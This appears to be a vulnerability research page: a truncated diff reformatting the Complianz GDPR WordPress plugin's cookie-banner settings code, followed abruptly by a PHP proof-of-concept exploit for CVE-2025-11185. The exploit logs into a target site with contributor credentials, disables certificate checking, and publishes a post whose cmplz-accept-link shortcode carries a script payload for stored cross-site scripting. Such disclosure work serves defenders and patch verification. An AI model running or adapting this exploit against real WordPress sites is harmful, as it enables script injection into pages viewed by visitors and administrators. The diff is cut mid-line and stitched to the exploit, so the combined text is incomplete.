+		$banner_text          = __( 'We use technologies like cookies to store and/or access device information. We do this to improve browsing experience and to show (non-) personalized ads. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.', 'complianz-gdpr' );
+		$field['default']     = $banner_text;
 		$field['placeholder'] = $banner_text;
 	}

@@ -68,40 +87,50 @@
 }

 add_filter( 'cmplz_fields', 'cmplz_add_cookiebanner_settings', 10 );
+/**
+ * Add cookie banner settings fields.
+ *
+ * @param array $fields Existing fields configuration.
+ * @return array Modified fields configuration.
+ */
 function cmplz_add_cookiebanner_settings( $fields ) {
-	$banner_text = __( "To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.", 'complianz-gdpr' );
-	$category_help = cmplz_get_option( 'country_company' ) === "FR" ? [
+	$banner_text   = __( 'To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.', 'complianz-gdpr' );
+	$category_help = 'FR' === cmplz_get_option( 'country_company' ) ? array(
 		'label' => 'default',
-		'title' => __( "Categories in France", "complianz-gdpr" ),
-		'text'  => __( "Due to the French CNIL guidelines we suggest using the Accept - Deny - View preferences template. For more information, read about the CNIL updated privacy guidelines in this %sarticle%s.",
-			'complianz-gdpr' ),
-		'url'   => "https://complianz.io/cnil-updated-privacy-guidelines/",
-	] : false;
+		'title' => __( 'Categories in France', 'complianz-gdpr' ),
+		/* translators: %s: opening and closing link tags */
+		'text'  => __(
+			'Due to the French CNIL guidelines we suggest using the Accept - Deny - View preferences template. For more information, read about the CNIL updated privacy guidelines in this %1$sarticle%2$s.',
+			'complianz-gdpr'
+		),
+		'url'   => 'https://complianz.io/cnil-updated-privacy-guidelines/',
+	) : false;

-	$fields = array_merge( $fields,
-		[
+	$fields = array_merge(
+		$fields,
+		array(
 			/* ----- General ----- */

-			//for condition purposes only
-			[
+			// For condition purposes only.
+			array(
 				'id'          => 'consent_type',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'hidden',
-			],
-			[
+			),
+			array(
 				'id'          => 'title',
-				'label'       => __( "Consent banner title", 'complianz-gdpr' ),
+				'label'       => __( 'Consent banner title', 'complianz-gdpr' ),
 				'placeholder' => __( 'Descriptive title of the cookiebanner', 'complianz-gdpr' ),
 				'tooltip'     => __( 'For internal use only', 'complianz-gdpr' ),
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'text',
-			],
+			),

-			[
+			array(
 				'id'               => 'use_categories',
 				'menu_id'          => 'banner-general',
 				'group_id'         => 'banner-general',
@@ -112,27 +141,29 @@
 					'save-preferences' => __( 'Accept - Deny - Save Preferences', 'complianz-gdpr' ),
 					'no'               => __( 'Accept - Deny', 'complianz-gdpr' ),
 				),
-				'label'            => __( "Categories", 'complianz-gdpr' ),
+				'label'            => __( 'Categories', 'complianz-gdpr' ),
 				'tooltip'          => __( 'With categories, you can let users choose which category of cookies they want to accept.', 'complianz-gdpr' ) . ' '
-				                      . __( 'Depending on your settings and cookies you use, there can be two or three categories. With Tag Manager you can use more, custom categories.',
-						'complianz-gdpr' ),
+										. __(
+											'Depending on your settings and cookies you use, there can be two or three categories. With Tag Manager you can use more, custom categories.',
+											'complianz-gdpr'
+										),
 				'help'             => $category_help,
 				'default'          => 'view-preferences',
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'consent_type' => 'optin',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'manage_consent_options',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'select',
-				'placeholder' => __( "Manage consent", 'complianz-gdpr' ),
-				'label'       => __( "Manage consent display options", 'complianz-gdpr' ),
+				'placeholder' => __( 'Manage consent', 'complianz-gdpr' ),
+				'label'       => __( 'Manage consent display options', 'complianz-gdpr' ),
 				'tooltip'     => __( 'Select how the manage consent text should appear.', 'complianz-gdpr' ),
 				'options'     => array(
 					'hover-hide-mobile' => __( 'Hover on Desktop - Hide on Mobile (Default)', 'complianz-gdpr' ),
@@ -141,153 +172,155 @@
 					'hide-everywhere'   => __( 'Hide everywhere', 'complianz-gdpr' ),
 				),
 				'default'     => 'hover-hide-mobile',
-			],
-			[
-				'id'          => 'disable_cookiebanner',
-				'source_id' => 'enable_cookie_banner',
-				'data_target' => 'banner',
-				'source_mapping' => [
-					//source value => target value
-					'no' => 1,
+			),
+			array(
+				'id'             => 'disable_cookiebanner',
+				'source_id'      => 'enable_cookie_banner',
+				'data_target'    => 'banner',
+				'source_mapping' => array(
+					// Source value => target value.
+					'no'  => 1,
 					'yes' => 0,
-				],
-				'menu_id'     => 'banner-general',
-				'group_id'    => 'banner-general',
-				'type'        => 'checkbox',
-				'label'       => __( "Disable consent banner", 'complianz-gdpr' ),
-				'default'     => false,
-			],
-			[
+				),
+				'menu_id'        => 'banner-general',
+				'group_id'       => 'banner-general',
+				'type'           => 'checkbox',
+				'label'          => __( 'Disable consent banner', 'complianz-gdpr' ),
+				'default'        => false,
+			),
+			array(
 				'id'               => 'default',
 				'menu_id'          => 'banner-general',
 				'group_id'         => 'banner-general',
 				'data_target'      => 'banner',
 				'type'             => 'checkbox',
-				'label'            => __( "Default consent banner", 'complianz-gdpr' ),
-				'help'             => [
+				'label'            => __( 'Default consent banner', 'complianz-gdpr' ),
+				'help'             => array(
 					'label' => 'default',
-					'title' => __( "Default consent banner", 'complianz-gdpr' ),
-					'text'  => __( 'When enabled, this is the consent banner that is used for all visitors. Enabling it will disable this setting on the current default banner. Disabling it will enable randomly a different default banner.',
-						"complianz-gdpr" ),
-				],
+					'title' => __( 'Default consent banner', 'complianz-gdpr' ),
+					'text'  => __(
+						'When enabled, this is the consent banner that is used for all visitors. Enabling it will disable this setting on the current default banner. Disabling it will enable randomly a different default banner.',
+						'complianz-gdpr'
+					),
+				),
 				'default'          => false,
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'a_b_testing_buttons' => '1',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'hide_preview',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
-				'label'       => __( "Hide preview", 'complianz-gdpr' ),
+				'label'       => __( 'Hide preview', 'complianz-gdpr' ),
 				'default'     => false,
-			],
-			[
+			),
+			array(
 				'id'          => 'reset_cookiebanner',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'banner-reset-button',
-				'label'       => __( "Reset to default values", 'complianz-gdpr' ),
-				'button_text' => __( "Reset", 'complianz-gdpr' ),
-				'help'        => [
+				'label'       => __( 'Reset to default values', 'complianz-gdpr' ),
+				'button_text' => __( 'Reset', 'complianz-gdpr' ),
+				'help'        => array(
 					'label' => 'warning',
-					'title' => __( "Reset the consent banner", 'complianz-gdpr' ),
-					'text'  => __( "If you want to start from the default values, you can use the reset button.", "complianz-gdpr" ) . ' ' . __( "Texts will also get reset.", "complianz-gdpr" ),
-				],
+					'title' => __( 'Reset the consent banner', 'complianz-gdpr' ),
+					'text'  => __( 'If you want to start from the default values, you can use the reset button.', 'complianz-gdpr' ) . ' ' . __( 'Texts will also get reset.', 'complianz-gdpr' ),
+				),
 				'default'     => false,
-			],
+			),

 			/*
 			 *
 			 * US settings
 			 *
-			 * */
+			 */

-			[
-				'id'               => 'dismiss_on_scroll',
+			array(
+				'id'          => 'dismiss_on_scroll',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
-				'data_target'      => 'banner',
-				'type'             => 'checkbox',
-				'label'            => __( "Dismiss on scroll", 'complianz-gdpr' ),
-				'tooltip'          => __( 'When dismiss on scroll is enabled, the consent banner will be dismissed as soon as the user scrolls.', 'complianz-gdpr' ),
-				'default'          => false,
-				'react_conditions' => [
+				'data_target' => 'banner',
+				'type'        => 'checkbox',
+				'label'       => __( 'Dismiss on scroll', 'complianz-gdpr' ),
+				'tooltip'     => __( 'When dismiss on scroll is enabled, the consent banner will be dismissed as soon as the user scrolls.', 'complianz-gdpr' ),
+				'default'     => false,
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'consent_type' => 'optout',
-					]
-				],
-			],
-			[
-				'id'               => 'dismiss_on_timeout',
+					),
+				),
+			),
+			array(
+				'id'          => 'dismiss_on_timeout',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
-				'data_target'      => 'banner',
-				'type'             => 'checkbox',
-				'label'            => __( "Dismiss on time out", 'complianz-gdpr' ),
-				'tooltip'          => __( 'When dismiss on time out is enabled, the consent banner will be dismissed after 10 seconds, or the time you choose below.', 'complianz-gdpr' ),
-				'default'          => false,
-				'react_conditions' => [
+				'data_target' => 'banner',
+				'type'        => 'checkbox',
+				'label'       => __( 'Dismiss on time out', 'complianz-gdpr' ),
+				'tooltip'     => __( 'When dismiss on time out is enabled, the consent banner will be dismissed after 10 seconds, or the time you choose below.', 'complianz-gdpr' ),
+				'default'     => false,
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'consent_type' => 'optout',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'               => 'dismiss_timeout',
-				'menu_id'     => 'banner-general',
-				'group_id'    => 'banner-general',
+				'menu_id'          => 'banner-general',
+				'group_id'         => 'banner-general',
 				'data_target'      => 'banner',
 				'type'             => 'number',
-				'label'            => __( "Timeout in seconds", 'complianz-gdpr' ),
+				'label'            => __( 'Timeout in seconds', 'complianz-gdpr' ),
 				'default'          => 10,
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'dismiss_on_timeout' => true,
 						'consent_type'       => 'optout',
-					]
-				],
-			],
+					),
+				),
+			),
 			/* ----- Appearance ----- */
-			[
+			array(
 				'id'          => 'position',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'select',
-				'label'       => __( "Position", 'complianz-gdpr' ),
+				'label'       => __( 'Position', 'complianz-gdpr' ),
 				'options'     => array(
-					'center'       => __( "Center", 'complianz-gdpr' ),
-					'bottom'       => __( "Bottom", 'complianz-gdpr' ),
-					'bottom-left'  => __( "Bottom left", 'complianz-gdpr' ),
-					'bottom-right' => __( "Bottom right", 'complianz-gdpr' ),
+					'center'       => __( 'Center', 'complianz-gdpr' ),
+					'bottom'       => __( 'Bottom', 'complianz-gdpr' ),
+					'bottom-left'  => __( 'Bottom left', 'complianz-gdpr' ),
+					'bottom-right' => __( 'Bottom right', 'complianz-gdpr' ),
 				),
 				'default'     => 'bottom-right',
-			],
-			[
+			),
+			array(
 				'id'          => 'animation',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'select',
-				'label'       => __( "Animation", 'complianz-gdpr' ),
+				'label'       => __( 'Animation', 'complianz-gdpr' ),
 				'options'     => array(
-					'none'  => __( "None", 'complianz-gdpr' ),
-					'fade'  => __( "Fade", 'complianz-gdpr' ),
-					'slide' => __( "Slide", 'complianz-gdpr' ),
+					'none'  => __( 'None', 'complianz-gdpr' ),
+					'fade'  => __( 'Fade', 'complianz-gdpr' ),
+					'slide' => __( 'Slide', 'complianz-gdpr' ),
 				),
 				'default'     => 'none',
-			],
-			[
+			),
+			array(
 				'id'               => 'banner_width',
 				'menu_id'          => 'appearance',
 				'group_id'         => 'appearance',
@@ -296,124 +329,127 @@
 				'default'          => '526',
 				'minimum'          => '300',
 				'maximum'          => '1500',
-				'label'            => __( "Width of the banner in pixels", 'complianz-gdpr' ),
-				'react_conditions' => [
+				'label'            => __( 'Width of the banner in pixels', 'complianz-gdpr' ),
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'!position' => 'bottom',
-					]
-				],
-			],
+					),
+				),
+			),

-			[
+			array(
 				'id'               => 'checkbox_style',
 				'menu_id'          => 'appearance',
 				'group_id'         => 'appearance',
 				'data_target'      => 'banner',
 				'type'             => 'select',
-				'label'            => __( "Checkbox style", 'complianz-gdpr' ),
-				'tooltip'          => __( "This style is for the checkboxes on the consent banner, as well as on your policy for managing consent.", 'complianz-gdpr' ),
-				'options'          => [
-					'classic' => __( "Classic", 'complianz-gdpr' ),
-					'slider'  => __( "Slider", 'complianz-gdpr' ),
-				],
+				'label'            => __( 'Checkbox style', 'complianz-gdpr' ),
+				'tooltip'          => __( 'This style is for the checkboxes on the consent banner, as well as on your policy for managing consent.', 'complianz-gdpr' ),
+				'options'          => array(
+					'classic' => __( 'Classic', 'complianz-gdpr' ),
+					'slider'  => __( 'Slider', 'complianz-gdpr' ),
+				),
 				'default'          => 'slider',
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'!use_categories' => 'no',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'legal_documents',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
 				'default'     => true,
-				'label'       => __( "Legal document links on banner", 'complianz-gdpr' ),
+				'label'       => __( 'Legal document links on banner', 'complianz-gdpr' ),
 				'comment'     => __( 'On the consent banner the generated documents are shown. The title is based on the actual post title.', 'complianz-gdpr' ),
-			],
-			[
+			),
+			array(
 				'id'          => 'use_logo',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
-				'tooltip'     => __( "You can upload your own logo, hide it, or use the site logo.", 'complianz-gdpr' ) . ' '
-				                 . __( "The site logo is the default logo set in your theme's site identity.", 'complianz-gdpr' ),
+				'tooltip'     => __( 'You can upload your own logo, hide it, or use the site logo.', 'complianz-gdpr' ) . ' '
+								. __( "The site logo is the default logo set in your theme's site identity.", 'complianz-gdpr' ),
 				'type'        => 'banner_logo',
-				'label'       => __( "Logo", 'complianz-gdpr' ),
+				'label'       => __( 'Logo', 'complianz-gdpr' ),
 				'options'     => array(
-					'hide'      => __( "Hide", 'complianz-gdpr' ),
-					'site'      => __( "Use Site Logo", 'complianz-gdpr' ),
-					'complianz' => __( "Use "Powered by Complianz"", 'complianz-gdpr' ),
-					'custom'    => __( "Upload Custom Logo", 'complianz-gdpr' ) . ' (2 : 1)',
+					'hide'      => __( 'Hide', 'complianz-gdpr' ),
+					'site'      => __( 'Use Site Logo', 'complianz-gdpr' ),
+					'complianz' => __( 'Use "Powered by Complianz"', 'complianz-gdpr' ),
+					'custom'    => __( 'Upload Custom Logo', 'complianz-gdpr' ) . ' (2 : 1)',
 				),
 				'default'     => 'hide',
-			],
-			[
+			),
+			array(
 				'id'          => 'logo_attachment_id',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'hidden',
-			],
-			[
+			),
+			array(
 				'id'          => 'close_button',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
-				'label'       => __( "Close button", 'complianz-gdpr' ),
-				'tooltip'     => __( "If enabled, a close icon will be shown on your consent banner.", 'complianz-gdpr' ),
+				'label'       => __( 'Close button', 'complianz-gdpr' ),
+				'tooltip'     => __( 'If enabled, a close icon will be shown on your consent banner.', 'complianz-gdpr' ),
 				'default'     => true,
-			],
-			[
+			),
+			array(
 				'id'          => 'use_box_shadow',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
 				'default'     => true,
-				'label'       => __( "Box shadow", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Box shadow', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'header_footer_shadow',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'default'     => false,
 				'type'        => 'checkbox',
-				'label'       => __( "Box shadow on header and footer", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Box shadow on header and footer', 'complianz-gdpr' ),
+			),
+			array(
 				'id'               => 'soft_cookiewall',
 				'menu_id'          => 'appearance',
 				'group_id'         => 'appearance',
 				'data_target'      => 'banner',
 				'type'             => 'checkbox',
 				'default'          => false,
-				'label'            => __( "Show as soft cookie wall", 'complianz-gdpr' ),
-				'comment'   => __("Unlike the regular cookie wall, the soft cookie wall doesn't block visitors that do not deny consent or dismiss the banner. It will however forces a choice before visitors enter your website.",
-					"complianz-gdpr") .' '. cmplz_sprintf(__("Read more about %sthe soft cookie wall%s.", "complianz-gdpr"),'<a target="_blank" href="https://complianz.io/the-soft-cookie-wall/" aria-label="Read more about the soft cookie wall">', '</a>'),
-				'help'             => [
+				'label'            => __( 'Show as soft cookie wall', 'complianz-gdpr' ),
+				'comment'          => __(
+					"Unlike the regular cookie wall, the soft cookie wall doesn't block visitors that do not deny consent or dismiss the banner. It will however forces a choice before visitors enter your website.",
+					'complianz-gdpr'
+					/* translators: %1$s: opening link tag, %2$s: closing link tag */
+				) . ' ' . cmplz_sprintf( __( 'Read more about %1$sthe soft cookie wall%2$s.', 'complianz-gdpr' ), '<a target="_blank" href="https://complianz.io/the-soft-cookie-wall/" aria-label="Read more about the soft cookie wall">', '</a>' ),
+				'help'             => array(
 					'label' => 'default',
-					'title' => __( "Soft cookie wall", 'complianz-gdpr' ),
-					'text'  => __( "Read more about our privacy-friendly cookie wall.", 'complianz-gdpr' ),
+					'title' => __( 'Soft cookie wall', 'complianz-gdpr' ),
+					'text'  => __( 'Read more about our privacy-friendly cookie wall.', 'complianz-gdpr' ),
 					'url'   => 'https://complianz.io/the-soft-cookie-wall/',
-				],
-				'react_conditions' => [
+				),
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'!consent_type' => 'optout',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'colorpalette_border_radius',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'borderradius',
 				'default'     => array(
@@ -423,12 +459,12 @@
 					'left'   => '12',
 					'type'   => 'px',
 				),
-				'label'       => __( "Border radius banner", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Border radius banner', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'border_width',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'borderwidth',
 				'default'     => array(
@@ -437,12 +473,12 @@
 					'bottom' => '0',
 					'left'   => '0',
 				),
-				'label'       => __( "Border width banner", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Border width banner', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'buttons_border_radius',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'borderradius',
 				'default'     => array(
@@ -452,28 +488,28 @@
 					'left'   => '6',
 					'type'   => 'px',
 				),
-				'label'       => __( "Border radius buttons", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Border radius buttons', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'font_size',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'number',
 				'default'     => 12,
-				'label'       => __( "Font size", 'complianz-gdpr' ),
-			],
+				'label'       => __( 'Font size', 'complianz-gdpr' ),
+			),

 			/* ----- colors ----- */

-			[
+			array(
 				'id'           => 'colorpalette_background',
 				'menu_id'      => 'colors',
 				'group_id'     => 'colors-general',
 				'data_target'  => 'banner',
 				'type'         => 'colorpicker',
-				'master_label' => __( "General", 'complianz-gdpr' ),
-				'label'        => __( "Background", 'complianz-gdpr' ),
+				'master_label' => __( 'General', 'complianz-gdpr' ),
+				'label'        => __( 'Background', 'complianz-gdpr' ),
 				'default'      => array(
 					'color'  => '#ffffff',
 					'border' => '#f2f2f2',
@@ -481,21 +517,21 @@
 				'fields'       => array(
 					array(
 						'fieldname' => 'color',
-						'label'     => __( "Background", 'complianz-gdpr' ),
+						'label'     => __( 'Background', 'complianz-gdpr' ),
 					),
 					array(
 						'fieldname' => 'border',
-						'label'     => __( "Border", 'complianz-gdpr' ),
+						'label'     => __( 'Border', 'complianz-gdpr' ),
 					),
 				),
-			],
-			[
+			),
+			array(
 				'id'          => 'colorpalette_text',
-				'menu_id'      => 'colors',
-				'group_id'     => 'colors-general',
+				'menu_id'     => 'colors',
+				'group_id'    => 'colors-general',
 				'data_target' => 'banner',
 				'type'        => 'colorpicker',
-				'label'       => __( "Text", 'complianz-gdpr' ),
+				'label'       => __( 'Text', 'complianz-gdpr' ),
 				'default'     => array(
 					'color'     => '#222222',
 					'hyperlink' => '#1E73BE',
@@ -503,54 +539,54 @@
 				'fields'      => array(
 					array(
 						'fieldname' => 'color',
-						'label'     => __( "Color", 'complianz-gdpr' ),
+						'label'     => __( 'Color', 'complianz-gdpr' ),
 					),
 					array(
 						'fieldname' => 'hyperlink',
-						'label'     => __( "Hyperlink", 'complianz-gdpr' ),
+						'label'     => __( 'Hyperlink', 'complianz-gdpr' ),
 					),
 				),
-			],
-			[
-				'id'          => 'colorpalette_toggles',
-				'menu_id'      => 'colors',
-				'group_id'     => 'col

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-11185 - Complianz | GDPR/CCPA Cookie Consent <= 7.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

<?php
/**
 * Proof of Concept for CVE-2025-11185
 * Requires: Contributor-level WordPress credentials
 * Target: WordPress sites with Complianz plugin <= 7.4.3
 */

// Configuration
$target_url = 'https://target-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload - XSS via cmplz-accept-link shortcode attribute
$payload = '[cmplz-accept-link attribute="<script>alert(document.domain)</script>"]';

// Initialize cURL session
$ch = curl_init();

// Step 1: Authenticate and get WordPress nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Create a new post with malicious shortcode
$create_post_url = $target_url . '/wp-admin/post-new.php';

// First, get the nonce for creating posts
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the page (simplified - in real scenario use proper parsing)
// Note: Actual implementation would need to parse the HTML for _wpnonce

$post_data = array(
    'post_title' => 'Test Post with XSS',
    'content' => $payload,
    'post_status' => 'publish',
    '_wpnonce' => 'NONCE_PLACEHOLDER', // Replace with actual nonce
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'post_type' => 'post',
    'submit' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

$response = curl_exec($ch);

// Check if post was created successfully
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false) {
    echo "[+] Exploit successful! Post created with XSS payload.n";
    echo "[+] Visit the post to trigger the XSS.n";
} else {
    echo "[-] Exploit failed. Check credentials and permissions.n";
}

curl_close($ch);
?>